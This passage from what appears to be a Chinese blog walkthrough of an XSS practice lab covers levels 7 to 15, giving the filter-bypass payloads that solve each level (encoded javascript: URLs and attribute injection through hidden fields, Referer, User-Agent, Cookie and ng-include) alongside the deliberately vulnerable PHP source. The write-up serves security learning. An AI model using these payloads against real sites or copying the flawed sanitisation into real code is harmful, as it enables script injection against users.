invoke__">str_replace</span>(<span class="string">"data"</span>,<span class="string">""</span>,<span class="variable">$str4</span>);</span><br><span class="line"><span class="variable">$str6</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"href"</span>,<span class="string">""</span>,<span class="variable">$str5</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level7.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.<span class="variable">$str6</span>.<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=搜索 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level7.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str6</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 8</p> <p>本题以添加下划线和html实体编码的形式绕过了href 、<> 、script 、"等字符,我们可以采用HTML实体编码+URL编码的形式在URL中直接写入,也可以在input标签内输入HTML实体编码。input标签也会默认对Unicode进行解码,所以本题可使用编码方式绕过。</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202154853561.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202154853561.png" alt="image-20240202154853561" ></a></p> <p>相关网站:</p> <p><a class="link" href="https://config.net.cn/tools/HtmlEncode.html" >在线Html实体编码解码<i class="fas fa-external-link-alt"></i></a></p> <p><a class="link" href="http://www.esjson.com/urlEncode.html" >在线url网址编码解码<i class="fas fa-external-link-alt"></i></a></p> <p><a class="link" href="http://www.esjson.com/unicodeEncode.html" >在线Unicode编码转换工具)<i class="fas fa-external-link-alt"></i></a></p> <p><strong>答案:<code>javaScript:alert(1)</code></strong></p> <p>即:javascript:alert(1) #HTML实体编码->URL编码</p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$_GET</span>[<span class="string">"keyword"</span>]);</span><br><span class="line"><span class="variable">$str2</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"script"</span>,<span class="string">"scr_ipt"</span>,<span class="variable">$str</span>);</span><br><span class="line"><span class="variable">$str3</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"on"</span>,<span class="string">"o_n"</span>,<span class="variable">$str2</span>);</span><br><span class="line"><span class="variable">$str4</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"src"</span>,<span class="string">"sr_c"</span>,<span class="variable">$str3</span>);</span><br><span class="line"><span class="variable">$str5</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"data"</span>,<span class="string">"da_ta"</span>,<span class="variable">$str4</span>);</span><br><span class="line"><span class="variable">$str6</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"href"</span>,<span class="string">"hr_ef"</span>,<span class="variable">$str5</span>);</span><br><span class="line"><span class="variable">$str7</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">'"'</span>,<span class="string">'&quot'</span>,<span class="variable">$str6</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level8.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=添加友情链接 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<center><BR><a href="'</span>.<span class="variable">$str7</span>.<span class="string">'">友情链接</a></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 9</p> <p>本题相较Level 8新增了网址合法性检测,经测试只需带有<a class="link" href="http://xn--zlr2ki56c6eedn6choa/" >http://即可通过检测<i class="fas fa-external-link-alt"></i></a>,可以将alert()内的字符改成http://,也可以在文末添加并使用注释符进行注释。</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202155310700.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202155310700.png" alt="image-20240202155310700" ></a></p> <p><strong>答案:<code>javaScript:alert('http://')</code></strong></p> <p>即:javascript:alert(‘http://’)</p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$_GET</span>[<span class="string">"keyword"</span>]);</span><br><span class="line"><span class="variable">$str2</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"script"</span>,<span class="string">"scr_ipt"</span>,<span class="variable">$str</span>);</span><br><span class="line"><span class="variable">$str3</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"on"</span>,<span class="string">"o_n"</span>,<span class="variable">$str2</span>);</span><br><span class="line"><span class="variable">$str4</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"src"</span>,<span class="string">"sr_c"</span>,<span class="variable">$str3</span>);</span><br><span class="line"><span class="variable">$str5</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"data"</span>,<span class="string">"da_ta"</span>,<span class="variable">$str4</span>);</span><br><span class="line"><span class="variable">$str6</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"href"</span>,<span class="string">"hr_ef"</span>,<span class="variable">$str5</span>);</span><br><span class="line"><span class="variable">$str7</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">'"'</span>,<span class="string">'&quot'</span>,<span class="variable">$str6</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level9.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=添加友情链接 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="literal">false</span>===<span class="title function_ invoke__">strpos</span>(<span class="variable">$str7</span>,<span class="string">'http://'</span>))</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>'</span>;</span><br><span class="line"> }</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">{</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<center><BR><a href="'</span>.<span class="variable">$str7</span>.<span class="string">'">友情链接</a></center>'</span>;</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 10</p> <p>测试第一个标签处,发现全都被过滤</p> <p><a href="https://img-blog.csdnimg.cn/cac51a8eb6fd47de8782e2b57d225cf8.png"><img lazyload alt="image" data-src="https://img-blog.csdnimg.cn/cac51a8eb6fd47de8782e2b57d225cf8.png" alt="img" ></a></p> <p>只能从源代码中的三个hidden元素入手,进行传值测试后发现t_sort有回显(GET),其余两个猜测为POST型</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202155934507.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202155934507.png" alt="image-20240202155934507" ></a></p> <p><strong>答案:<code>?t_sort=" onfocus=javascript:alert() type="text//</code></strong> ,因为此处输入框被隐藏,需要添加type=“text”,或者在控制台内修改此处的hidden为button等。</p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"keyword"</span>];</span><br><span class="line"><span class="variable">$str11</span> = <span class="variable">$_GET</span>[<span class="string">"t_sort"</span>];</span><br><span class="line"><span class="variable">$str22</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">">"</span>,<span class="string">""</span>,<span class="variable">$str11</span>);</span><br><span class="line"><span class="variable">$str33</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<"</span>,<span class="string">""</span>,<span class="variable">$str22</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form id=search></span></span><br><span class="line"><span class="string"><input name="t_link" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_history" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_sort" value="'</span>.<span class="variable">$str33</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level10.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 11</p> <p>查看网页源代码发现有四个hidden,分别尝试传值发现t_sort有回显,但几乎所有方法都被过滤,猜测t_ref为Referer头</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204135104746.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204135104746.png" alt="image-20240204135104746" ></a></p> <p>BP抓包向Referer头填充数值1即可发现回显在t_ref内,可以在Referer头内构造Payload,相应包正确后在抓到的包内添加Referer头并放包即可。</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204135754206.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204135754206.png" alt="image-20240204135754206" ></a></p> <p><strong>答案:<code>Referer: " onclick="alert(1)" type="true</code></strong></p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><!DOCTYPE html><!--STATUS OK--><html></span><br><span class="line"><head></span><br><span class="line"><meta http-equiv=<span class="string">"content-type"</span> content=<span class="string">"text/html;charset=utf-8"</span>></span><br><span class="line"><script></span><br><span class="line">window.alert = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="function"></span>{ </span><br><span class="line"><span class="title function_ invoke__">confirm</span>(<span class="string">"完成的不错!"</span>);</span><br><span class="line"> window.location.href=<span class="string">"level12.php?keyword=good job!"</span>; </span><br><span class="line">}</span><br><span class="line"></script></span><br><span class="line"><title>欢迎来到level11</title></span><br><span class="line"></head></span><br><span class="line"><body></span><br><span class="line"><h1 align=center>欢迎来到level11</h1></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"keyword"</span>];</span><br><span class="line"><span class="variable">$str00</span> = <span class="variable">$_GET</span>[<span class="string">"t_sort"</span>];</span><br><span class="line"><span class="variable">$str11</span>=<span class="variable">$_SERVER</span>[<span class="string">'HTTP_REFERER'</span>];</span><br><span class="line"><span class="variable">$str22</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">">"</span>,<span class="string">""</span>,<span class="variable">$str11</span>);</span><br><span class="line"><span class="variable">$str33</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<"</span>,<span class="string">""</span>,<span class="variable">$str22</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form id=search></span></span><br><span class="line"><span class="string"><input name="t_link" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_history" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_sort" value="'</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str00</span>).<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_ref" value="'</span>.<span class="variable">$str33</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level11.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"></body></span><br><span class="line"></html></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 12</p> <p>与11题原理相同,注入点在UA头</p> <p><strong>答案:<code>User-Agent: " onclick="alert(1)" type="true</code></strong></p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><!DOCTYPE html><!--STATUS OK--><html></span><br><span class="line"><head></span><br><span class="line"><meta http-equiv=<span class="string">"content-type"</span> content=<span class="string">"text/html;charset=utf-8"</span>></span><br><span class="line"><script></span><br><span class="line">window.alert = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="function"></span>{ </span><br><span class="line"><span class="title function_ invoke__">confirm</span>(<span class="string">"完成的不错!"</span>);</span><br><span class="line"> window.location.href=<span class="string">"level13.php?keyword=good job!"</span>; </span><br><span class="line">}</span><br><span class="line"></script></span><br><span class="line"><title>欢迎来到level12</title></span><br><span class="line"></head></span><br><span class="line"><body></span><br><span class="line"><h1 align=center>欢迎来到level12</h1></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"keyword"</span>];</span><br><span class="line"><span class="variable">$str00</span> = <span class="variable">$_GET</span>[<span class="string">"t_sort"</span>];</span><br><span class="line"><span class="variable">$str11</span>=<span class="variable">$_SERVER</span>[<span class="string">'HTTP_USER_AGENT'</span>];</span><br><span class="line"><span class="variable">$str22</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">">"</span>,<span class="string">""</span>,<span class="variable">$str11</span>);</span><br><span class="line"><span class="variable">$str33</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<"</span>,<span class="string">""</span>,<span class="variable">$str22</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form id=search></span></span><br><span class="line"><span class="string"><input name="t_link" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_history" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_sort" value="'</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str00</span>).<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_ua" value="'</span>.<span class="variable">$str33</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level12.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"></body></span><br><span class="line"></html></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 13</p> <p>原理与11题一样,注入点在Cookie,注意要触发cookie</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204140248710.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204140248710.png" alt="image-20240204140248710" ></a></p> <p><strong>答案:<code>Cookie: user=" onclick="alert(1)" type="true</code></strong></p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><!DOCTYPE html><!--STATUS OK--><html></span><br><span class="line"><head></span><br><span class="line"><meta http-equiv=<span class="string">"content-type"</span> content=<span class="string">"text/html;charset=utf-8"</span>></span><br><span class="line"><script></span><br><span class="line">window.alert = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="function"></span>{ </span><br><span class="line"><span class="title function_ invoke__">confirm</span>(<span class="string">"完成的不错!"</span>);</span><br><span class="line"> window.location.href=<span class="string">"level14.php"</span>; </span><br><span class="line">}</span><br><span class="line"></script></span><br><span class="line"><title>欢迎来到level13</title></span><br><span class="line"></head></span><br><span class="line"><body></span><br><span class="line"><h1 align=center>欢迎来到level13</h1></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">setcookie</span>(<span class="string">"user"</span>, <span class="string">"call me maybe?"</span>, <span class="title function_ invoke__">time</span>()+<span class="number">3600</span>);</span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"keyword"</span>];</span><br><span class="line"><span class="variable">$str00</span> = <span class="variable">$_GET</span>[<span class="string">"t_sort"</span>];</span><br><span class="line"><span class="variable">$str11</span>=<span class="variable">$_COOKIE</span>[<span class="string">"user"</span>];</span><br><span class="line"><span class="variable">$str22</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">">"</span>,<span class="string">""</span>,<span class="variable">$str11</span>);</span><br><span class="line"><span class="variable">$str33</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<"</span>,<span class="string">""</span>,<span class="variable">$str22</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form id=search></span></span><br><span class="line"><span class="string"><input name="t_link" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_history" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_sort" value="'</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str00</span>).<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_cook" value="'</span>.<span class="variable">$str33</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level13.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"></body></span><br><span class="line"></html></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 14</p> <p>本题环境出现问题,略(Windows服务器下无法复现)</p> </li> <li> <p>Level 15</p> <p>本题考查ng-include函数的使用</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204140554202.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204140554202.png" alt="image-20240204140554202" ></a></p> <p><strong>答案:<code>src='level1.php?name=<script>alert(1)</script>'</code></strong></p> <ul> <li> <p><code>ng-include</code>是AngularJS框架中的一个指令(directive)。</p> <p><code>ng-include</code>用于在AngularJS应用中包含外部的HTML文件或其他AngularJS模板。<strong>引入AngularJS库:</strong> 确保在你的HTML文件中引入了AngularJS库。</p> <ol> <li> <pre><code class="language-html"><script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.8.0/angular.min.js"></script> XML2. **创建AngularJS应用:** 在HTML文件中定义一个AngularJS应用。 ```html <div ng-app="myApp"> <!-- 应用内容将在这里 --> </div> <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">2. **使用`ng-include`指令:** 在需要包含外部内容的地方使用`ng-include`指令,并指定要包含的文件路径。</span><br><span class="line"></span><br><span class="line"> ```html</span><br><span class="line"> <div ng-include="'path/to/your/template.html'"></div></span><br></pre></td></tr></table></figure> 注意:单引号内的路径可以是相对路径或绝对路径。 </code></pre> </li> <li> <p><strong>定义AngularJS模块和控制器:</strong> 在JavaScript中定义AngularJS模块和控制器,并将其与应用相关联。</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"> <span class="keyword">var</span> app = angular.<span class="title function_">module</span>(<span class="string">'myApp'</span>, []);</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"> app.<span class="title function_">controller</span>(<span class="string">'myController'</span>, <span class="keyword">function</span>(<span class="params">$scope</span>) {</span></span><br><span class="line"><span class="language-javascript"> <span class="comment">// 控制器逻辑</span></span></span><br><span class="line"><span class="language-javascript"> });</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag"></<span class="name">script</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <p><strong>关联控制器和<code>ng-include</code>:</strong> 在包含<code>ng-include</code>的元素中使用<code>ng-controller</code>来关联控制器。</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">div</span> <span class="attr">ng-controller</span>=<span class="string">"myController"</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">div</span> <span class="attr">ng-include</span>=<span class="string">"'path/to/your/template.html'"</span>></span><span class="tag"></<span class="name">div</span>></span></span><br><span class="line"><span class="tag"></<span class="name">div</span>></span></span><br></pre></td></tr></table></figure> </li> </ol> <p>这样,<code>ng-include</code>指令就会加载指定的HTML文件或AngularJS模板,并将其内容包含在应用中。这是一种实现模块化和代码重用的方式,特别适用于大型AngularJS应用。</p> </li> </ul> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><html ng-app></span><br><span class="line"><head></span><br><span class="line"> <meta charset=<span class="string">"utf-8"</span>></span><br><span class="line"> <script src=<span class="string">"angular.min.js"</span>></script></span><br><span class="line"><script></span><br><span class="line">window.alert = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="function"></span>{ </span><br><span class="line"><span class="title function_ invoke__">confirm</span>(<span class="string">"完成的不错!"</span>);</span><br><span class="line"> window.location.href=<span class="string">"level16.php?keyword=test"</span>; </span><br><span class="line">}</span><br><span class="line"></script></span><br><span class="line"><title>欢迎来到level15</title></span><br><span class="line"></head></span><br><span class="line"><h1 align=center>欢迎来到第<span class="number">15</span>关,自己想个办法走出去吧!</h1></span><br><span class="line"><p align=center><img src=level15.png></p></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"src"</span>];</span><br><span 